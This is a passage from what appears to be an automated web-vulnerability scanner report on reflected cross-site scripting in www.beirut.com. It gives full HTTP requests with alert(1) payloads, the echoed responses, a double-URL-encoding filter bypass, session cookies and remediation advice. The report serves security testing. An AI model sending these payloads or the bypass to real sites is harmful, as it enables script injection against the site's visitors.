The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3b14%2527%253balert%25281%2529%252f%252ff3f450929b9 was submitted in the REST URL parameter 4. This input was echoed as d3b14';alert(1)//f3f450929b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097d3b14%2527%253balert%25281%2529%252f%252ff3f450929b9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:42:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Index';
var initfacebox='';
var contactid='6097d3b14';alert(1)//f3f450929b9';
var showfacebox='';
</script>
...[SNIP]...

4.1089. http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ab4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61ed4218169 was submitted in the REST URL parameter 4. This input was echoed as 45ab4"><script>alert(1)</script>61ed4218169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/609745ab4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61ed4218169 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:41:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=609745ab4"><script>alert(1)</script>61ed4218169&randstyle=purple">
...[SNIP]...

4.1090. http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Clemenceau/Fluks/5938

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7c0f%2527%253balert%25281%2529%252f%252f2b97de70f11 was submitted in the REST URL parameter 4. This input was echoed as c7c0f';alert(1)//2b97de70f11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Clemenceau/Fluks/5938c7c0f%2527%253balert%25281%2529%252f%252f2b97de70f11 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:30:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='5938c7c0f';alert(1)//2b97de70f11';
var showfacebox='';
</script>
...[SNIP]...

4.1091. http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Clemenceau/Fluks/5938

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b86132d791 was submitted in the REST URL parameter 4. This input was echoed as 872f3"><script>alert(1)</script>5b86132d791 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Clemenceau/Fluks/5938872f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b86132d791 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:27:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=5938872f3"><script>alert(1)</script>5b86132d791&randstyle=green">
...[SNIP]...

4.1092. http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61e41%2527%253balert%25281%2529%252f%252fa52dc1a1c5b was submitted in the REST URL parameter 4. This input was echoed as 61e41';alert(1)//a52dc1a1c5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/591061e41%2527%253balert%25281%2529%252f%252fa52dc1a1c5b HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:39:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='591061e41';alert(1)//a52dc1a1c5b';
var showfacebox='';
</script>
...[SNIP]...

4.1093. http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f283%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c15393c0d0 was submitted in the REST URL parameter 4. This input was echoed as 5f283"><script>alert(1)</script>3c15393c0d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/59105f283%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c15393c0d0 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:38:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=59105f283"><script>alert(1)</script>3c15393c0d0&randstyle=blue">
...[SNIP]...

4.1094. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9cdf"><a>92e5fcb6396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDod9cdf"><a>92e5fcb6396/Exhibitions/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:46:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDod9cdf"><a>92e5fcb6396/Exhibitions&listingtype=events.php&Types=">
...[SNIP]...

4.1095. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1975'-alert(1)-'b7645df14c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDoa1975'-alert(1)-'b7645df14c6/Exhibitions/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDoa1975'-alert(1)-'b7645df14c6/Exhibitions';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1096. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e1d9'-alert(1)-'c8b1e6c1dea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Exhibitions7e1d9'-alert(1)-'c8b1e6c1dea/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:07:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='ThingsToDo/Exhibitions7e1d9'-alert(1)-'c8b1e6c1dea';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1097. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Exhibitions/6382333962

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582c7"><a>fe506376230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Exhibitions582c7"><a>fe506376230/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:58:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Exhibitions582c7"><a>fe506376230&listingtype=events.php&Types=16">
...[SNIP]...

4.1098. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9af28'-alert(1)-'01fcb4776a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo9af28'-alert(1)-'01fcb4776a3/Festivals/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:55:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo9af28'-alert(1)-'01fcb4776a3/Festivals';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1099. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c41b"><a>0ed6ef3c7d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo9c41b"><a>0ed6ef3c7d1/Festivals/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:45:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo9c41b"><a>0ed6ef3c7d1/Festivals&listingtype=events.php&Types=">
...[SNIP]...

4.1100. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b690"><a>bf31567f7f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

